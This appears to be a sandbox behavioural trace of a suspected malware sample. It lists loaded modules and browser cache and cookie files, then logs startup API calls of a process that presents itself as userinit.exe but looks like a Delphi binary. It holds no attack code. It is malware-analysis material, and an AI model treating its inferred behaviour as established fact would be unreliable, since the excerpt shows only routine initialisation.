filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 3370
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 3371
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 3372
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 3373
start_va = 0x140000
end_va = 0x140fff
entry_point = 0x140000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 3374
start_va = 0x2b60000
end_va = 0x2c5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b60000"
filename = ""
Region:
id = 3375
start_va = 0x150000
end_va = 0x150fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 3376
start_va = 0x6ceb0000
end_va = 0x6cec8fff
entry_point = 0x6ceb0000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 3377
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 3378
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 3379
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 3380
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 3397
start_va = 0x980000
end_va = 0x9bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000980000"
filename = ""
Region:
id = 3398
start_va = 0x2c60000
end_va = 0x2d5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c60000"
filename = ""
Region:
id = 3399
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 3400
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 3401
start_va = 0x2d60000
end_va = 0x302efff
entry_point = 0x2d60000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 3402
start_va = 0x160000
end_va = 0x161fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 3403
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 3404
start_va = 0x170000
end_va = 0x170fff
entry_point = 0x170000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 3414
start_va = 0x180000
end_va = 0x181fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000180000"
filename = ""
Region:
id = 3415
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 3416
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 3417
start_va = 0x170000
end_va = 0x170fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000170000"
filename = ""
Region:
id = 3418
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 3419
start_va = 0x1a0000
end_va = 0x1cbfff
entry_point = 0x1a0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 3420
start_va = 0x1d0000
end_va = 0x1d7fff
entry_point = 0x1d0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 3421
start_va = 0x1e0000
end_va = 0x1effff
entry_point = 0x1e0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 3422
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 3423
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 3424
start_va = 0x800000
end_va = 0x8dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3425
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 3426
start_va = 0x3030000
end_va = 0x31affff
entry_point = 0x0
region_type = private
name = "private_0x0000000003030000"
filename = ""
Region:
id = 3427
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 3428
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 3444
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 3445
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 3446
start_va = 0x3030000
end_va = 0x30effff
entry_point = 0x3030000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 3447
start_va = 0x3170000
end_va = 0x31affff
entry_point = 0x0
region_type = private
name = "private_0x0000000003170000"
filename = ""
Thread:
id = 236
os_tid = 0xfa8
[0107.171] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0107.171] GetKeyboardType (nTypeFlag=0) returned 4
[0107.171] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0107.171] GetStartupInfoA (in: lpStartupInfo=0xcf994 | out: lpStartupInfo=0xcf994*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0107.171] GetVersion () returned 0x1db10106
[0107.171] GetVersion () returned 0x1db10106
[0107.171] GetCurrentThreadId () returned 0xfa8
[0107.171] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0xcf490, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0107.171] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xcf36b, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0107.171] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xcf480 | out: phkResult=0xcf480*=0x0) returned 0x2
[0107.171] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xcf480 | out: phkResult=0xcf480*=0x0) returned 0x2
[0107.171] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xcf480 | out: phkResult=0xcf480*=0x0) returned 0x2
[0107.171] lstrcpynA (in: lpString1=0xcf36b, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0107.171] GetThreadLocale () returned 0x409
[0107.172] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0xcf47b, cchData=5 | out: lpLCData="ENU") returned 4
[0107.172] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0107.172] lstrcpynA (in: lpString1=0xcf388, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0107.172] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0107.172] lstrcpynA (in: lpString1=0xcf388, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0107.172] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0107.173] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0107.173] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x203640
[0107.173] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x620000
[0107.173] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x204640
[0107.173] VirtualAlloc (lpAddress=0x620000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x620000
[0107.173] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0107.173] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0107.173] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0107.173] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0107.173] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0107.173] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0107.173] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0107.173] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0107.173] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0107.173] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0xcf5b4, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0xcf5a0, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0107.174] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0xcf5a0, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0107.174] GetVersionExA (in: lpVersionInformation=0xcf938*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcf938*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0107.174] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0107.174] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0107.174] GetThreadLocale () returned 0x409
[0107.174] GetThreadLocale () returned 0x409
[0107.174] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0xcf810, cchData=256 | out: lpLCData="Jan") returned 4
[0107.174] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0xcf810, cchData=256 | out: lpLCData="January") returned 8
[0107.174] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0xcf810, cchData=256 | out: lpLCData="Feb") returned 4
[0107.174] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0xcf810, cchData=256 | out: lpLCData="February") returned 9
[0107.174] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0xcf810, cchData=256 | out: lpLCData="Mar") returned 4
[0107.174] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0xcf810, cchData=256 | out: lpLCData="March") returned 6
[0107.174] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0xcf810, cchData=256 | out: lpLCData="Apr") returned 4
[0107.174] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0xcf810, cchData=256 | out: lpLCData="April") returned 6
[0107.174] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0xcf810, cchData=256 | out: lpLCData="May") returned 4
[0107.174] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0xcf810, cchData=256 | out: lpLCData="May") returned 4
[0107.174] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0xcf810, cchData=256 | out: lpLCData="Jun") returned 4
[0107.174] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0xcf810, cchData=256 | out: lpLCData="June") returned 5
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0xcf810, cchData=256 | out: lpLCData="Jul") returned 4
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0xcf810, cchData=256 | out: lpLCData="July") returned 5
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0xcf810, cchData=256 | out: lpLCData="Aug") returned 4
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0xcf810, cchData=256 | out: lpLCData="August") returned 7
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0xcf810, cchData=256 | out: lpLCData="Sep") returned 4
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0xcf810, cchData=256 | out: lpLCData="September") returned 10
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0xcf810, cchData=256 | out: lpLCData="Oct") returned 4
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0xcf810, cchData=256 | out: lpLCData="October") returned 8
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0xcf810, cchData=256 | out: lpLCData="Nov") returned 4
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0xcf810, cchData=256 | out: lpLCData="November") returned 9
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0xcf810, cchData=256 | out: lpLCData="Dec") returned 4
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0xcf810, cchData=256 | out: lpLCData="December") returned 9
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0xcf810, cchData=256 | out: lpLCData="Sun") returned 4
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0xcf810, cchData=256 | out: lpLCData="Sunday") returned 7
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0xcf810, cchData=256 | out: lpLCData="Mon") returned 4
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0xcf810, cchData=256 | out: lpLCData="Monday") returned 7
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0xcf810, cchData=256 | out: lpLCData="Tue") returned 4
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0xcf810, cchData=256 | out: lpLCData="Tuesday") returned 8
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0xcf810, cchData=256 | out: lpLCData="Wed") returned 4
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0xcf810, cchData=256 | out: lpLCData="Wednesday") returned 10
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0xcf810, cchData=256 | out: lpLCData="Thu") returned 4
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0xcf810, cchData=256 | out: lpLCData="Thursday") returned 9
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0xcf810, cchData=256 | out: lpLCData="Fri") returned 4
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0xcf810, cchData=256 | out: lpLCData="Friday") returned 7
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0xcf810, cchData=256 | out: lpLCData="Sat") returned 4
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0xcf810, cchData=256 | out: lpLCData="Saturday") returned 9
[0107.175] GetThreadLocale () returned 0x409
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0xcf86c, cchData=256 | out: lpLCData="$") returned 2
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0xcf86c, cchData=256 | out: lpLCData="0") returned 2
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0xcf86c, cchData=256 | out: lpLCData="0") returned 2
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0xcf964, cchData=2 | out: lpLCData=",") returned 2
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0xcf964, cchData=2 | out: lpLCData=".") returned 2
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0xcf86c, cchData=256 | out: lpLCData="2") returned 2
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0xcf964, cchData=2 | out: lpLCData="/") returned 2
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0xcf86c, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0107.175] GetThreadLocale () returned 0x409
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xcf838, cchData=256 | out: lpLCData="1") returned 2
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0xcf86c, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0107.175] GetThreadLocale () returned 0x409
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xcf838, cchData=256 | out: lpLCData="1") returned 2
[0107.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0xcf964, cchData=2 | out: lpLCData=":") returned 2
[0107.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0xcf86c, cchData=256 | out: lpLCData="AM") returned 3
[0107.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0xcf86c, cchData=256 | out: lpLCData="PM") returned 3
[0107.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0xcf86c, cchData=256 | out: lpLCData="0") returned 2
[0107.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0xcf86c, cchData=256 | out: lpLCData="0") returned 2
[0107.176] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0xcf86c, cchData=256 | out: lpLCData="0") returned 2
[0107.176] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0xcf964, cchData=2 | out: lpLCData=",") returned 2
[0107.176] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0107.176] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0107.176] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0107.176] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0107.176] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0107.176] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0107.176] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0107.176] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0107.176] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0107.176] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0107.176] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0107.176] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0107.176] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0107.176] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0107.176] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0107.177] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0107.177] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0107.177] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0107.177] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0107.177] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0107.177] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0107.177] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0107.177] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0107.177] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0107.177] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0107.177] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0107.177] GetDC (hWnd=0x0) returned 0x1201087d
[0107.177] GetDeviceCaps (hdc=0x1201087d, index=90) returned 96
[0107.177] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0107.177] GetDC (hWnd=0x0) returned 0x1201087d
[0107.178] GetDeviceCaps (hdc=0x1201087d, index=104) returned 0
[0107.178] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0107.178] CreatePalette (plpal=0xcf5c8) returned 0x11080838
[0107.178] GetStockObject (i=7) returned 0x1b00017
[0107.178] GetStockObject (i=5) returned 0x1900015
[0107.178] GetStockObject (i=13) returned 0x18a002e
[0107.178] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0107.178] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0107.178] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0107.178] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0xcf5c4, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
